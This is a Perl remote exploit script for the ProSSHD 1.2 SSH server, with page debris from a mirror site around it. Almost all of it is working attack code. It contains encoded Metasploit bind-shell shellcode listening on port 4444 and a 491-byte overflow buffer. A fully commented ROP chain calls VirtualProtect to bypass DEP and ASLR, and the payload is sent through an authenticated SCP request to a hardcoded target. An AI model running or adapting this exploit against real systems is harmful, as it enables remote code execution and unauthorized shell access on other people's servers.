扫码分享
验证:
体验盒子# Exploit Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
# Date: 03.05.2010
# Author: Alexey Sintsov
# Version: 1.2
# Tested on: Windows XP SP3 / Windows 7
# CVE :
# Code :
################################################################################
# Original exploit by S2 Crew [Hungary]
# * * *
# ROP for DEP and ASLR bypass by Alexey Sintsov from DSecRG [www.dsecrg.com]
# * * *
# Tested on:ProSSHD v1.2 on Windows XP and Windows 7 with DEP for all
#
# Special for XAKEP magazine[www.xakep.ru]
#
#
# CVE: -
#!/usr/bin/perl
use Net::SSH2;
$username = '';
$password = '';
$host = '192.168.126.129';#Remote host
#$host = '192.168.13.6';
$port = 22;
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=, EXITFUNC=process, InitialAutoRunScript=,
# AutoRunScript=
$shell =
"\xba\xda\x29\x13\xda\xd9\xe9\xd9\x74\x24\xf4\x58\x31\xc9" .
"\xb1\x56\x31\x50\x13\x83\xc0\x04\x03\x50\xd5\xcb\xe6\x26" .
"\x01\x82\x09\xd7\xd1\xf5\x80\x32\xe0\x27\xf6\x37\x50\xf8" .
"\x7c\x15\x58\x73\xd0\x8e\xeb\xf1\xfd\xa1\x5c\xbf\xdb\x8c" .
"\x5d\x71\xe4\x43\x9d\x13\x98\x99\xf1\xf3\xa1\x51\x04\xf5" .
"\xe6\x8c\xe6\xa7\xbf\xdb\x54\x58\xcb\x9e\x64\x59\x1b\x95" .
"\xd4\x21\x1e\x6a\xa0\x9b\x21\xbb\x18\x97\x6a\x23\x13\xff" .
"\x4a\x52\xf0\xe3\xb7\x1d\x7d\xd7\x4c\x9c\x57\x29\xac\xae" .
"\x97\xe6\x93\x1e\x1a\xf6\xd4\x99\xc4\x8d\x2e\xda\x79\x96" .
"\xf4\xa0\xa5\x13\xe9\x03\x2e\x83\xc9\xb2\xe3\x52\x99\xb9" .
"\x48\x10\xc5\xdd\x4f\xf5\x7d\xd9\xc4\xf8\x51\x6b\x9e\xde" .
"\x75\x37\x45\x7e\x2f\x9d\x28\x7f\x2f\x79\x95\x25\x3b\x68" .
"\xc2\x5c\x66\xe5\x27\x53\x99\xf5\x2f\xe4\xea\xc7\xf0\x5e" .
"\x65\x64\x79\x79\x72\x8b\x50\x3d\xec\x72\x5a\x3e\x24\xb1" .
"\x0e\x6e\x5e\x10\x2e\xe5\x9e\x9d\xfb\xaa\xce\x31\x53\x0b" .
"\xbf\xf1\x03\xe3\xd5\xfd\x7c\x13\xd6\xd7\x0b\x13\x18\x03" .
"\x58\xf4\x59\xb3\x4f\x58\xd7\x55\x05\x70\xb1\xce\xb1\xb2" .
"\xe6\xc6\x26\xcc\xcc\x7a\xff\x5a\x58\x95\xc7\x65\x59\xb3" .
"\x64\xc9\xf1\x54\xfe\x01\xc6\x45\x01\x0c\x6e\x0f\x3a\xc7" .
"\xe4\x61\x89\x79\xf8\xab\x79\x19\x6b\x30\x79\x54\x90\xef" .
"\x2e\x31\x66\xe6\xba\xaf\xd1\x50\xd8\x2d\x87\x9b\x58\xea" .
"\x74\x25\x61\x7f\xc0\x01\x71\xb9\xc9\x0d\x25\x15\x9c\xdb" .
"\x93\xd3\x76\xaa\x4d\x8a\x25\x64\x19\x4b\x06\xb7\x5f\x54" .
"\x43\x41\xbf\xe5\x3a\x14\xc0\xca\xaa\x90\xb9\x36\x4b\x5e" .
"\x10\xf3\x7b\x15\x38\x52\x14\xf0\xa9\xe6\x79\x03\x04\x24" .
"\x84\x80\xac\xd5\x73\x98\xc5\xd0\x38\x1e\x36\xa9\x51\xcb" .
"\x38\x1e\x51\xde";
$fuzz = "\x41"x491 .# buffer before RET addr rewriting
############################### ROP
# All ROP instructions from non ASLR modules (coming with ProSHHD distrib): MSVCR71.DLL and MFC71.DLL
# For DEP bypass used VirtualProtect call from non ASLR DLL - 0x7C3528DD (MSVCR71.DLL)
# this make stack executable:
#### RET rewrite###
"\x9F\x07\x37\x7C".# MOV EAX, EDI / POP EDI / POP ESI / RETN ; EAX points on our stack data with some offset
"\x11\x11\x11\x11".# JUNK---------------^^^ ^^^
"\x22\x22\x22\x22".# JUNK-------------------------^^^
"\x27\x34\x34\x7C".# MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10
"\x33\x33\x33\x33".# JUNK------------------------------^^^
"\xC1\x4C\x34\x7C".# POP EAX/ RETN
# ^^^
"\x33\x33\x33\x33".# ^^^
"\x33\x33\x33\x33".# ^^^
"\x33\x33\x33\x33".# ^^^
"\x33\x33\x33\x33".# ^^^
# ^^^
"\xC0\xFF\xFF\xFF".# ----^^^Param for next instruction...
"\x05\x1e\x35\x7C".# NEG EAX /RETN ; EAX will be 0x40 (param for VirtualProtect)
"\xc8\x03\x35\x7C".# MOV DS:[ECX], EAX / RETN; save 0x40 (3 param)
"\x40\xa0\x35\x7C".# MOV EAX, ECX / RETN ; restore pointer in EAX
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN ; Change position
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN ; EAX=ECX-0x0c
"\x08\x94\x16\x7C".# MOV DS:[EAX+0x4], EAX / RETN ;save addres for VirtualProtect (1 param)
"\xB9\x1F\x34\x7C".# INC EAX / RETN ; oh ... and move pointer back
"\xB9\x1F\x34\x7C".# INC EAX / RETN
"\xB9\x1F\x34\x7C".# INC EAX / RETN
"\xB9\x1F\x34\x7C".# INC EAX / RETN ; EAX=ECX=0x8
"\xB2\x01\x15\x7C".# MOV [EAX+0x4], 1 ; size for VirtualProtect (2 param)
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN ; Change position for output from VirtualProtect
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\xA1\x1D\x34\x7C".# DEC EAX/ RETN
"\x27\x34\x34\x7C".# MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10
"\x33\x33\x33\x33".# JUNK------------------------------^^^
"\x40\xa0\x35\x7C".# MOV EAX, ECX / RETN ; restore pointer in EAX
#
"\x33\x33\x33\x33".#
"\x33\x33\x33\x33".#
"\x33\x33\x33\x33".#
"\x33\x33\x33\x33".#
"\xB9\x1F\x34\x7C".# INC EAX / RETN ; and again...
"\xB9\x1F\x34\x7C".# INC EAX / RETN
"\xB9\x1F\x34\x7C".# INC EAX / RETN
"\xB9\x1F\x34\x7C".# INC EAX / RETN
"\xE5\x6B\x36\x7C". # MOV DS:[EAX+0x14], ECX ; save output addr for VirtualProtect (4 param)
"\xBA\x1F\x34\x7C"x204 . # RETN fill.....
"\xDD\x28\x35\x7C".# CALL VirtualProtect / LEA ESP, [EBP-58] / POP EDI / ESI / EBX / RETN;Call VirtualProtect
"AAAABBBBCCCCDDDD". # Here is place for params (VirtualProtect)
####################### retrun into stack after VirtualProtect
"\x1A\xF2\x35\x7C". # ADD ESP, 0xC / RETN; take next ret
"XXXYYYZZZ123". # trash
"\x30\x5C\x34\x7C". # 0x7c345c2e: ANDPS XMM0, XMM3-- (+0x2 to address and....)--> PUSH ESP / RETN ; EIP=ESP
"\x90"x14 . # NOPs here is the begining of shellcode
$shell; # shellcode 8)
$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port) || die "\nError: Connection Refused!\n";
$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
#sleep(10);
$scpget = $ssh2->scp_get($fuzz);
$ssh2->disconnect();
体验盒子
